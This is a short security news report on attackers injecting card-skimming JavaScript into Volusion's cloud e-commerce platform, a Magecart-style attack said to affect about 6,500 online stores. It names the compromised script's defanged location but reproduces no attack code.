Attackers compromised Volusion’s cloud-based e-commerce platform infrastructure. Hackers attacked it and injected a malicious code that steals bancard data entered by users into online forms.Currently, the malicious code has not yet been removed from the Volusion servers, and it still compromises the company’s client stores.
It is already known that 6,500 stores were affected by this attack, but in the end their number may turn out to be even higher, since last month Volusion announced that it already serves more than 20,000 customers. One of the largest victims of the incident was the Sesame Street Live store, which has currently suspended operations.
Volusion describes itself as a leading e-commerce solution for small businesses. With its powerful shopping cart software, Volusion has helped thousands of merchants and supposedly Shoppers have spent more than $28 billion in transactions and placed over 185 million orders on Volusion stores.
Volusion representatives do not respond to emails and phone calls from either journalists or researchers from Check Point, Trend Micro, or RiskIQ, who also noticed a hack.
The compromised file is located at https://storage.googleapis[.]com/volusionapi/resources.js and is uploaded to Volusion online stores through /a/j/vnav.js. A copy of the infected file can be found here.
What happened to Volusion is a classic Magecart attack, during which attackers use web scrimmers and steal payment card data through online stores, rather than through ATMs. Let me remind you that many Magecart groups practice attacks not on the stores themselves, but on various service providers and platforms.
For example, in the summer of this year, it was for this reason that Picreel, Alpaca Forms, AppLixir, RYVIU, OmniKick, eGain and AdMaxim, which provide services to online stores, were compromised.